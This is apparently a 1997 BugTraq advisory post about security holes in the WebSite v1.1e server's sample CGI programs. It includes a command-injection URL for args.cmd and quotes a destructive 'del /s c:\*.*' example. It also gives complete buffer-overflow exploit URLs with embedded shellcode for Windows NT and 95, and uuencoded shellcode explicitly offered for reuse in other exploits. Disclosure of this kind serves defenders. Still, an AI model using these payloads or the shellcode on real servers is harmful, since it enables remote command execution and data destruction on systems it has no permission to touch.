WebSite v1.1e for Windows NT & 95 buffer overflows

Date: Mon, 6 Jan 1997 20:56:21 -0500
From: solar@ideal.ru
To: Multiple recipients of list BUGTRAQ 
 
Hi!
 
Actually, this message is about buffer overflows in Windows, in general.
But let me put some exploits in here first.
 
I just happened to check out WebSite v1.1e for Windows NT and '95. There're
some nice security holes there, in the CGI example programs (should I say -
"as usual"?).
 
The first thing that I noticed is about the scripts, they have the following
lines in cgi-dos/args.cmd (and some others):
 
> rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
> rem a query string of xxx&del+/s+c:\*.*  Your hard drive gets
> rem erased!! Same goes for args and extra path info!!!
 
and then some lines like this:
 
> echo QUERY_STRING="%QUERY_STRING%"
 
Obviously, just using the quotes is not enough. Why can't I close them, or
use a linefeed? The exploit can be:
 
http://website.host/cgi-dos/args.cmd?"&any+dos+command"
 
Well, the stuff I just told about might be too obvious, some sysadmins
I know already have all the example scripts removed. Now, let's get to the
interesting stuff.
 
There's also an example C program, compiled to cgi-shl/win-c-sample.exe,
with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the
following line in there:
 
> char *argv[32]; // Max 32 command line args
 
That's a WinMain local variable, and is passed to SplitArgs(), which does
no bounds checking while filling it with the command line parameters. You
know what that means -- a nice buffer overflow.
 
Here are the exploits (I split the long URLs into several lines), you
can use any dos command in them (replace spaces with _'s):
 
-- WinNT (any version?):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm
 
-- Win95 (the release version only, will crash others!):
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm
 
The example dos commands just copy the WebSite's readme.1st file, so you
can later check if the exploit worked by trying http://website.host/x1.htm.
Note that the server should respond to these exploits with an "Error: no
blank line separating header and data", because of the "1 file(s) copied"
message appearing without a blank line before it (which is required for
HTTP; if you need a command's output, you can redirect it to a file, and
get that file via HTTP with a separate request).
 
Finally, to the thing I'm writing this message for -- I mean the Win32
shellcode. I haven't seen any Win32 overflow exploits before (actually,
didn't look for them), so I had to code my own shellcode. This seems not
to be that simple as it would be for Win16, or as it is for most UNIX
systems. The problem is that normally Windows kernel calls require extra
relocation items, but the shellcode appears in an already loaded program.
 
The solution I used in the exploits above is doing a call to fixed kernel
offset. Actually, the WinNT exploit does pattern searches in the kernel
(due to the number of different kernel versions out there), while the Win95
one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord
Byte for loading his WinIce and telling me the offsets). The two functions
I use are WinExec and ExitProcess.
 
Here're the two shellcodes in binary, uuencoded, so you can use them in
your own exploits if you wish.
 
begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[
`
end
 
begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end
 
Note that I had to avoid using some codes (which the server didn't allow
me to use), that's why I do things like:
 
db 68h   ; push imm32
pop esi  ; \
pop eax  ; | - the value being pushed
jmp esi  ; /
call esp
 
instead of:
 
call $+5 ; would contain zeroes
pop esi
 
Have fun disassembling. I'll appreciate any suggestions on doing the kernel
calls a better way.
 
As for the holes -- the fix is obvious, just remove the examples after
you, the webmaster, have checked them out. Also, the holes will probably
get fixed in the next WebSite release (I wonder if they credit me;-). BTW,
they didn't even have the quotes in scripts I mentioned above, in some
earlier versions.
 
Signed,
Solar Designer